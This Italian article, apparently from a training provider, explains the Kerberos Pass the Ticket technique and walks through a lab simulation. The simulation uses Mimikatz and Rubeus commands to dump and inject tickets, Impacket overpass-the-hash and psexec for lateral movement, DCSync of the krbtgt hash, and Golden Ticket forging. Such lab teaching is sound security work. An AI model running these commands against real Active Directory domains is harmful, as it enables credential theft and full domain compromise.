Iscriviti al webinar gratuito del 12 Maggio per diventare Forensic Analyst! Scopri di più
Corso Ethical Hacker: accedi alla promozione fino al 30 Arile! Scopri di più
Pass the Ticket è una tecnica di abuso del protocollo Kerberos che consente a un attaccante di autenticarsi su sistemi remoti utilizzando ticket rubati, senza mai conoscere la password dell'account vittima. Il meccanismo è semplice nella sua logica: se possiedi un Ticket Granting Ticket (TGT) valido, puoi richiedere Service Ticket per qualsiasi risorsa a cui l'utente ha accesso; se possiedi un Service Ticket specifico, puoi accedere direttamente alla risorsa corrispondente.
La tecnica si colloca in due tattiche distinte. Nella fase di Defense Evasion (TA0005), l'attaccante elude i controlli di accesso tradizionali perché non genera eventi di autenticazione classici basati su password. Nella fase di Lateral Movement (TA0008), i ticket rubati diventano il vettore per spostarsi lateralmente attraverso la rete, raggiungendo sistemi critici come file server, SharePoint e domain controller.
Due varianti meritano attenzione particolare. Il Golden Ticket sfrutta l'hash NTLM dell'account KRBTGT per forgiare TGT arbitrari, garantendo accesso virtualmente illimitato al dominio Active Directory. Il Silver Ticket prende di mira singoli servizi, generando ticket validi per risorse specifiche. Una terza variante, nota come overpass-the-hash, combina Pass the Hash con la creazione di ticket Kerberos legittimi, rendendo il traffico di rete indistinguibile da un'autenticazione normale. Tre gruppi APT documentati, 3 software e 4 mitigazioni compongono il panorama di questa tecnica.
La simulazione di Pass the Ticket in laboratorio richiede un ambiente Active Directory controllato con almeno un domain controller e una workstation unita al dominio. Il flusso operativo si articola in tre fasi: estrazione dei ticket, iniezione in memoria e accesso laterale.
Fase 1 — Estrazione dei ticket dalla memoria. Con Mimikatz (open source), il modulo sekurlsa consente di esportare tutti i ticket Kerberos presenti nella sessione corrente:
mimikatz # privilege::debug mimikatz # sekurlsa::tickets /export
Questo comando produce file .kirbi nella directory corrente, uno per ogni ticket in cache. In alternativa, Rubeus (open source) offre un approccio più chirurgico per estrarre i TGT dalla memoria LSASS:
Rubeus.exe dump /luid:0x3e7 /nowrap
Il parametro /luid consente di mirare a una specifica sessione di logon, mentre /nowrap produce output base64 su una singola riga, comodo per il copia-incolla in ambienti senza file transfer.
Fase 2 — Iniezione del ticket. Una volta ottenuto il file .kirbi o la stringa base64, l'attaccante lo inietta nella propria sessione. Con Mimikatz:
mimikatz # kerberos::ptt ticket_esportato.kirbi
Con Rubeus, passando direttamente il base64:
Rubeus.exe ptt /ticket:<base64_del_ticket>
Su sistemi Linux, Impacket (open source) offre strumenti equivalenti. Per ottenere un TGT a partire da un hash NTLM (overpass-the-hash) si usa getTGT.py:
getTGT.py -hashes :hash_ntlm dominio/utente
Il ticket viene salvato in formato .ccache. Per utilizzarlo, basta impostare la variabile d'ambiente:
export KRB5CCNAME=utente.ccache
A quel punto, qualsiasi tool Impacket può operare con autenticazione Kerberos aggiungendo il flag -k -no-pass, ad esempio:
psexec.py -k -no-pass dominio/utente@target_hostname
Fase 3 — Golden e Silver Ticket. Per simulare un Golden Ticket, serve prima l'hash NTLM dell'account KRBTGT, ottenibile tramite DCSync:
mimikatz # lsadump::dcsync /domain:lab.local /user:krbtgt
Poi si forgia il TGT:
mimikatz # kerberos::golden /user:Administrator /domain:lab.local /sid:S-1-5-21-... /krbtgt:<hash_ntlm> /ptt
Il flag /ptt inietta immediatamente il ticket in sessione. Per un Silver Ticket la logica è analoga, ma si usa l'hash dell'account di servizio e si specifica il servizio target con /service:cifs o /service:http.
Dopo l'iniezione, verifica l'accesso con klist per visualizzare i ticket in cache, poi tenta l'accesso al file system remoto con dir \\server\share per confermare il lateral movement.
Scarica la guida gratuita e segui il percorso corretto fin dal primo passo